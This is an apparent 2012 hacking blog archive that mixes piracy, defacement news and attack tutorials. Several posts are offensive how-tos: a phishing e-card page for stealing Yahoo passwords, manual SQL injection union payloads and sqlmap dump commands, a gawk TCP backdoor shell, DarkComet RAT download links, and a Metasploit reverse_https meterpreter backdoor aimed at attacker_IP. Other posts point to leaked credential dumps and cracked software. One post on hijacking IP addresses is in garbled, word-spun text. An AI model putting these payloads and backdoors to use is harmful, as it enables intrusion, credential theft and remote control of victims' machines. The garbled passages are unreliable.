Wednesday 25 July 2012

Internet Download Manager v6.11 Build 8 + Crack

INTERNET DOWNLOAD MANAGER v6.11
Good news for IDM Users, It's latest version v6.11Build 8 has been released,as you all know IDM is a Download Manager which accelerate your downloading 5 times,function like resume and schedule downloading are also available and it provide safe multiparts downloading. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages.Multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators, IDM segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance. 


Download IDM v6.11 Build 8 and its crack Here:-





Tuesday 24 July 2012

How to hack Hotmail Accounts

HACKING HOTMAIL ACCOUNTS
To hack any Hotmail account firstly you had to find an victim most of the people or companies have there Hotmail account send an email to them on Hotmail account and tell them to check their  account, then type their name below and access their email at the same time.


FIRST STEP:



Enter the Hotmail ID which you want to hack, remember that this hack attempt only works if the user has not logged out of Hotmail, If the user has logged out this attempt will not be successful and you will get a message saying you were logged out, type in there user name , make sure you have typed the username exactly right because Hotmail will not tell you if you have typed it incorrectly, and they also log the IP's of person filing incorrectly username or password to prevent from hacking cases.

SECOND STEP:

It is now time to view the html source code of the password page that you are on now, view the source for this page, five lines down or so from the top of the source code page, it will say

<form name="passwordform" action="http://somenumber/cgi-bin//start/username/anothernumber" method="post" target="_top">

THIRD STEP:

Go to the address in the action part of this code, http://somenumber/cgi-bin//start/username/anothernumber, If the hotmail user didn't logout, you will have access to their mailbox, If they logged out try another.

FOR ANY ADVANCE QUERY COMMENT HERE:


Thursday 19 July 2012

Download WHMCS Cracking Tool

An Introduction To " Directory Traversal Attacks "

Directory Traversal is an exploit/vulnerability which allow a remote attacker to access restricted directories and execute malicious commands.

What are Root Directory ?
Root Directory is a folder or a directory on the web server where all the web contents are placed which a normal user or a visitor of a website can see. Other directories present on the web server other than roOt might contain other sensitive information which the administrator don't the visitors to see. the content which is placed inside the Root Directory can seen by the visitor, they cannot see the content present outside the root directory. Root directory prevent users from accessing sensitive files like cmd.exe on a server running windows and password file on the system running LINUX/UNIX.






What a attacker can do if the website is vulnerable ?
If in case the web server is vulnerable to Directory Traversal Attacks, a remote attacker can step out of the Root Directory and access other important and sensitive files on the web server. Directory Traversal Attacks gives the attacker the ability to view and access the restricted files and directories which lead to the execution of malicious commands or even a full server compromise.


General tip to secure your website from Directory Traversal Attacks  ?
Update your webs server's software to the latest version, make sure all patches have been applied

Wednesday 18 July 2012

How to change IP Address








1) Getting Your IP Range:

It is not so diffcult to know your IP range, You can use Neo-Trace on your own IP, like for our test just look at your ip address, like imagine it as- 24.193.110.13 or go to http://whatsmyip.org/ to know your Ip address you can defiantly use the IP's found between 24.193.110.1 < [new ip] < 24.193.110.255, don't use like x.x.x.1 or x.x.x.255. To find your IP go to RUN program type cmd then command prompt scrren will open then type "ipconfig" and look for "ip address".

2) Subnet Mask, Default Gateway, DHCP Server:

 you would see something like this after opening ipconfig:

Windows IP Configuration

Host Name . . . . . . . . . . . . : Your PC Name
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xxxx.xx.x
Description . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)
Physical Address. . . . . . . . . : XX-XX-XX-XX-XX-XX
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 24.xxx.xxx.xx
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 24.xxx.xxx.x
DHCP Server . . . . . . . . . . . : 24.xx.xxx.xx
DNS Servers . . . . . . . . . . . : 24.xx.xxx.xxx
24.xx.xxx.xx
24.xx.xxx.xxx
Lease Obtained. . . . . . . . . . : Sunday, June 20, 2006 4:44:08 PM
Lease Expires . . . . . . . . . . : Monday, June 21, 2006 3:43:16 AM


This is all the information you will need for now,I sugest you either keep your dos/command prompt window open or copy & paste the information somewhere, to copy right click the window and select text and click once

3) Changing Your IP Address:

Then To change your ip address first choose any IP you like out of  ip range you found and  write it down, it is usualy a good idea to make sure the ip is dead [except for what we are going to do later on] so just ping it via "ping x.x.x.x" and if it times out then you can use it, now go to my computer, then control panel, in control panel select network connections and pick your active connection, probably local area connection or your ISP name, open that connection by double clicking on the icon in network connections, then select properties under the general tab, in the new window that pops up select internet protocol [TCP/IP] and click properties, it's under the general tab, in this new window select the general tab and choose "use the following ip address" and for the ip address enter the ip you would like to use [the one you picked from your subnet earlier] and for the subnet mask enter the subnet mask you got when your ran ipconfig /all, same goes for the default gateway, now select "use the following dns server addresses" and enter the information you got earlier, now just click ok, test that it worked, try to refresh a website and if it works you know everything is okay and you are connected, to make sure the change worked type ipconfig again and the ip address should have changed to your new one


4) DDoS And DoS Protection:
If your firewall shows that you are actuality ddosed, this is usualy back you are consistently accepting atempted UDP access several times a additional from either the aforementioned ip abode or assorted ip addresses [ddos], you can assure your-self by alteration your ip abode via the adjustment i declared above

5) Webservers And Added Services:
If you apperceive addition on your ip ambit is active a webserver and he or she has pissed you off or you aloof like messing about you can abduct their ip abode so any dns activity to that ip will appearance your armpit instead because you would be active a webserver your-self, to abduct an ip is to basicaly use the alteration ip abode adjustment aloft and acrimonious an ip that addition that is active a webserver has in use, generally you will be able to accumulate that ip at atomic for some time, added times you won't be able to use it so aloof accumulate aggravating untill it works, you your-self will charge to accept a web server on the aforementioned anchorage with your message, you can do this with added casework too, you can additionally DoS or DDoS the ip abode you are aggravating to abduct to bang him off the net


Tuesday 17 July 2012

How to Steal Yahoo ID


If You Want To Steal Your Friends Yahoo ID And Pass. Then Here Is The Simplest Method To Do It.
Simple method is by sending greeting cards from fake login page like you can create www.greetingoffer.xyz.com.

Let's Check Out The Procedure:-

1) Get the source html code of it in a notepad, Get or desgine your own login page.

2) Then after if you had got the source codes, find out the email id e-mail_here@yahoo.com in it

3) Replace the e-mail_here in [my id] with your friends id, this will be the id you want your friends/enemies passwords sent to

4) Make your fake webpage by copy pasting these html codes on your website [ preferably on geocities, it is  free, use the page builder option, in that use the insert forms and script, html option and paste the html codes, then your page is ready ]

5) Now  E-mail your friend like in this format :
View Your E-Card Snap Click One Of The following:-

http://www.your-site.com, or

Copy and paste the above link into your web browser's address window and

Enter this e-card number, 622686767495, on our e-card pick up page at :
http://www.your-site.com

We hope you enjoy your e-card, if you have any query then please visit
http://www.examplesite.com

 Thanks for using Yahoo! Greetings E-cards with http://www.examplesite.com




Saturday 14 July 2012

Pakistan Social Networking Website Database Exposed

     BOZOPARK DATABASE EXPOSED BY INDI-HEX

Database Of BozoPark Social Networking Website of Pakistan Design By DigitalDesginBox DDB was hacked by Un_N0n Antil0g,C0d3 Inj3ctor & Ash3ll.More then 400 Username and Password Along with Admin Username and password were leaked by them.

LEAKED DATABASE HERE:- pastebin.com/iRSdhGb4
SCREENSHOT:-



Simple SQL Injection Tutorial

SQL Injection.....
this can be perform on mozilla firefox web browser........
SQL websites looks like this "www.target.com/material.php?id=5"
it may be "/image.php?id="
"/product.php?id="
so on..............
first you need to check the vulrneablity of the website. for this just add ' after the url.. suppose the website is
www.target.com/material.php?id=5
add ' after this url..like
www.target.com/material.php.id=5' then press enter.. if it shows the error page then the website is vulrneable...
now lets start the real job....
now you have to find the numbers of columns for add the following in the url..
www.target.com/material.php?id=-5 order by 1--
www.target.com/material.php?id=-5 order by 2--
www.target.com/material.php?id=-5 order by 3--
www.target.com/material.php?id=-5 order by 4--
www.target.com/material.php?id=-5 order by 5--
check untill an error page appears..... now union select all the columns.. suppose i get an error page on 7.. so i will add this in url
www.target.com/material.php?id=-5 union select all 1,2,3,4,5,6,7--
afetr this the web page will show the columns number which will be used in further.. suppose I got 3 and 4.. then i will choose the column which is in bold font... suppose it is 3..
now you have to check the version.... note if its version is smaller the 5 you have to guss the table name which is very deficult and if its version is greater or equal to 5 you don't need to guss the table name..
to check the version just add the following
www.target.com/material.php?id=-5 union select all 1,2,@@version,4,5,6,7--
now find the database name.. for ths add following
www.target.com/material.php?id=-5 union select all 1,2,database,4,5,6,7--
now find the table names.. for this
www.target.com/material.php?id=-5 union select all 1,2,table_name,4,5,6,7 from information_schema.tables--
if you the the "character_sets" only as table name do the following
www.target.com/material.php?id=-5 union select all 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables--
now you get a list of table name... like users, admin, user_info, etc.. choose the table name.... suppose i choose "users" in my case.. now find the columns name...for this
www.target.com/material.php?id=-5 union select all 1,2,column_name,4,5,6,7 from information_schema.columns where table_name=users--
if error page appears the you have to change the table name in MSQL char....for this you have to download hackbar.... remember hackbar is a add on in firefox... you can not perform this in any other browser...
for downloading the hackbar on firefox... goto the following link.....
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
and if again an error page appears then just add "group_concat" in the url.. like this
www.target.com/material.php?id=-5 union select all 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=mysql char--
now it will show you the columns name of "users" table.... like "email", "password", "id", "address", "phone no.", etc
now chose the columns.... as an hacker i know all of you will choose "email" and "password"... so lets do
www.target.com/material.php?id=-5 union select all 1,2,group_concat(email,0x3a,password),4,5,6,7 from users--
done it will show all the email and their password.......
hope you all like!!!!!!!!!!!!!!!!!!

SQL Injection via SQL Map On Backtrack

Hack Website by SQL injection using sqlmap in BackTrack which is a linux based Operating System
suppose the target website is www.target.com/image.php?id=5
for checking for the vulnerability of the website just add ' at the end.. like this
www.target.com/image.php?id=5' then press Enter.. if an Error page appear then the website is vulnerable.... now start sqlmap in BackTrack...... type the following command
python ./sqlmap.py -u www.target.com/image.php?id=5 --dbs
this will give u the Database of the website now type
python ./sqlmap.py -u www.target.com/image.php?id=5 -D Database name --tables
this will give u the tables name.... now chose the Table name carefully...... then
python ./sqlmap.py -u www.target.com/image.php?id=5 -D Database name -T tablename --columns
this will give u the names of columns.... now chose column name carefully.....then
python ./sqlmap.py -u www.target.com/image.php?id=5 -D Database name -T tablename -C column name --dump
thats it..... you have done...........
for example:- Suppose the Database name is my_webarea and Table name is Admin_Page and column name is User_ID so the command will be
python ./sqlmap.py -u www.target.com/image.php?id=5 -D my_webarea -T Admin_Page -C User_ID --dump
hope you like... if you have any problem then Ask it in Comment!!!!!!!!!!!

Friday 13 July 2012

Mass Deface by Indian Hackers !


It Seems that Indian Hackers are Taking Revenge of Terrorist Attacks. As a result of this revenge many websites is getting hacked these days. Today 17 Yrs old Hacker Pr4th4m and One Professional Hacker name as Jaguar Hacker Hacked more than 300 websites. They Hacked these websites in the remembrance of 13/July Bombay attacks.




Pastbin: http://pastebin.com/xHW8bQRd

Pakistani Social Networking Website Data Exposed


Today a Hacking group named team INDI_HEX. Claimed to break into One Pakistani Social networking website. The Group then leaked database of thousands of email addresses and their passwords. "Un_N0n Antil0g" Admin of this group said that this attack is a revenge of 13th July Mumbai attacks.



===========================================
===========================================


MultiObfuscator 2.00

Please download this app. from Source.

MultiObfuscator is a professional cryptography tool that offers double
encryption, csprng based scrambling, csprng based whitening, and more.
Documentation provided.


Source: http://packetstormsecurity.org/files/114693

If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Thursday 12 July 2012

Department Of Applied Chemistry And Chemical Technology Website Hacked

Department Of Applied Chemistry And Chemical Technology Website Hacked By Silent Hacker INDISHELL.

Offical Website Of DACCT  University Of Karachi was hacked by INDISHELL. This is another major attack on university of pakistan by INDISHELL before this if your remember lahore university website was also hacked.

Airport Armed Police,Government Of Bangladesh Website Hacked

           AIRPORT ARMED POLICE AND SEVERAL GOVERNMENT WEBSITE OF        BANGLADESH WERE HACKED BY ICH CODE SMASHER...

Bangladesh government and educational sites like ammc.edu.bd, ssnic.edu.bd and also the airport armed police website aap.gov.bd was attacked by Indian Cyber Hunter leader ICH Code Smasher 
Aiport Armed Police has been recovered by BANGLADESH GREY HAT HACKERS.

WEBSITE LINK  




A Backdoor in gawk by thegrugg

BEGIN {
     port = 8080
     prompt = "bkd> "
     
    service = "/inet/tcp/" port "/0/0"
    while(1){
           do {
                 printf prompt |& service
                 service |& getline cmd
                 if(cmd) {
                       while((cmd |& getline) > 0)
                             print $0 |& service
                       close(cmd)
                 } 
           }

435,000 Yahoo usernames and passwords hacked and exposed

If you’re a Yahoo Voices user, it’s time to change your password.
Security for the service appears to have been compromised early Thursday morning. A list titled “Owned and Exposed” which is “brought to you by the D33Ds Company” was posted online revealing a number of details for the service including all of the email addresses and passwords for Yahoo Voices’ 450,000 users.



In checking the usernames, I was able to ascertain it is actually Yahoo! Voices that was affected.
That’s significant, because 435,000 is similar enough to the 600,000 users Yahoo currently references on the Voices website to conceivably be the contributor database as it existed some months or years in the past.
The passwords contained a wide variety of email addresses including those from yahoo.com, gmail.com, aol.com, and much more. The affected website was only named as a subdomain



of yahoo.com however digging through and searching for the hostname, the attacker forgot to remove the hostname “dbb1.ac.bf1.yahoo.com” (credit to Mubix for the hostname find).

Username Password List

Wednesday 11 July 2012

TN Cyber Crime Cell to investigate hacking of website

The Tamil Nadu police on Tuesday night said the Cyber Crime Cell has been asked to investigate the hacking of its website by Anonymous, a ‘hacktivist’ group.

In a statement here, Director General of Police K. Ramanujam said no defacing of the police website had taken place. “Data in the grievances database relating to complaints received online from the public and action taken on them have been taken and published,” he said.



The website, now being maintained by National Informatics Centre,a Science and Technology institution of the Centre, was intruded reportedly by 'Anonymous,' which has been protesting denial of access to certain websites by Internet Service Providers in pursuance of a copyright violation suit.


Hacked Joomla! v. [1.6.x] [1.7.x] [2.5.0-2.5.2] - Escalation of Privileges


This vulnerability allows us to escalate privileges joomla for registering a new user, for 1.6.x/1.7.x versions have not been issued so far no patch versions and 1.0.x/1.5.x/2.5.3 + are not vulnerable. but for our comfort the v. 1.5.x (which is not patched) joomla has the well-known bug of the token, you can change the admin pass, well that's another topic.




Let us focus on our own and

Wordpress all Version full Path Disclosure Vulnerability By KinG Of PiraTeS

================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \

================================================================================
##

BlendBlogger hacked by Silent Hacker

     HACKED BY SILENT HACKER AND INDISHELL
On Tuesday, June 10 2012 at 3.30 AM(INDIA) the blend blogger a blogging site of Pakistan was targeted by Silent hacker from team INDISHELL.Once again Pakistan cyber space was hit by INDISHELL as they reported that PAK-Hackers are destroying INDIAN CYBER SPACE.

Website:-  www.blendblogger.com




Tuesday 10 July 2012

Howto: Use openvpn config files on Mac OS X

This post will tell you how to use openvpn and openvpn config file on Mac OSX

1. Download the Tunnelblick from http://code.google.com/p/tunnelblick/

2. Open the downloaded disk image file (which mounts the disk image).
3. Double click on Tunnelblick icon to install program, after that take the step of Tunnelblick installer

4. After Install completed, copy your openvpn config files to ~/Library

Monday 9 July 2012

DNS Changer ทำงานยังไงกันแน่

เป็นประเด็นค่อนข้างมากกับเรื่อง Malware ที่ชือว่า DNS Changer วันนี้ขอหยิบยกมาพูดหน่อยละกันครับ

ก่อนที่จะรู้ว่า DNS Changer ทำงานยังไง เรามาดูก่อนดีกว่าว่า DNS คืออะไรครับ

DNS คืออะไร
โดยปกติแล้วการเข้าไปใช้งานเว็บไซด์ต่างๆ จะไม่ได้ติดต่อกันด้วยชื่อของเว็บไซด์อย่าง www.facebook.com, www.google.com หรอกนะ เพราะการเชื่อมต่อเน็ตเวิร์คต่างๆทำด้วย IP Address ส่วนชื่อเว็บไซด์(domain name)

Saturday 7 July 2012

Lahore University Website Hacked By INDI-HEX

HACKED BY TEAM  INDI-HEX

National University Of Modern Languages Lahore Campus Website was Hacked By Indian hacking team INDI-HEX. No data was leaked from the site only the  front page was get defaced by INDI-HEX.

Website:-   www.numllahore.edu.pk

DarkComet RAT Analyser and Link Download Of DarkComet 5.3.1

This download is the last version of DarkComet RAT 'cause DarkcoderSc (Jean-Pierre LESUEUR) announce he will end developing DarkComet RAT(you can get his announcement here.)

So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/

Friday 6 July 2012

How To Get Thousands Of Twitter Followers Per Day

Twitter, One of the most popular Micro Blogging Website today. Having hundreds and thousands of followers can be very beneficial fro you if you are a Blogger who is in a need for more traffic, By sharing your post links on Twitter. If you are not having Followers then sharing your post links won't help you to generate traffic for your blog/website, To get the appropriate traffic you should have Followers. There are many online websites and services which provides Twitter Followers for free, They help you to increase your followers but they don't help you to Generate traffic by sharing your post, Because those websites are automates and ultimately you won't get any traffic. Don't worry in this post I will be telling you all how to get thousands of twitter followers by just tweeting.

#teamfollowback is A Group of twitter members on twitter, who want a lot of followers. You need to join their Group by adding #teamfollowback suffix or Prefix on while tweeting.


Login to your Twitter Account.
Search For  #teamfollowback
Follow the people who have added #teamfollowback #ifollowback #ifollowall  in there tweets.
Follow morre and more people who have added those tags in there tweets, You will get the same i.e more followers.


Some more hash tags to get Followers on Twitter.


#teamfollowback
#ifollowall
#ifollowback
#1000_aday
#TFB
#followandgain
#TeamAutoFollow
#AutoFollowBack
#InstantFollow 


Tuesday 3 July 2012

How to convert CHM files into PDF files in Ubuntu

In the Ubuntu, chm2pdf is a Python script that converts CHM files into PDF files.




 
1. Install chm2pdf in ubuntu and another required application$sudo aptitude install chm2pdf python-chm pdftk htmldoc

2. Use the command chm2pdf
$ chm2pdf --book file.chm

3. you will receive file.pdf.

If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Monday 2 July 2012

Interesting exploit, Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service

If you want to see the exploit code, please go to the Source.


# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core

Using beef plugin with Metasploit

1. Run the beef service
$/pentest/web/beef/beef -x -v

2. In another console, Run the Metasploit Console
$msfconsole

3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git

4. Move file beef.rb to msf/plugins and lib/beef to msf/lib

5. Install hpricot gem
$gem install hpricot

6. In the Metasploit console,

Create Auto reconnect Backdoor With Metasploit

This post will show how to install the autoconnect backdoor in victim machine.

1.  Create the auto reconnect backdoor with metasploit.
msf> use payload/windows/meterpreter/reverse_https
msf> set LHOST attacker_IP
msf> set LPORT binding_port
msf> set SessionCommunicationTimeout 0
msf> set SessionExpirationTimeout 0
msf> generate -t exe -f /var/www/backdoor.exe

2. Binding receiving backdoor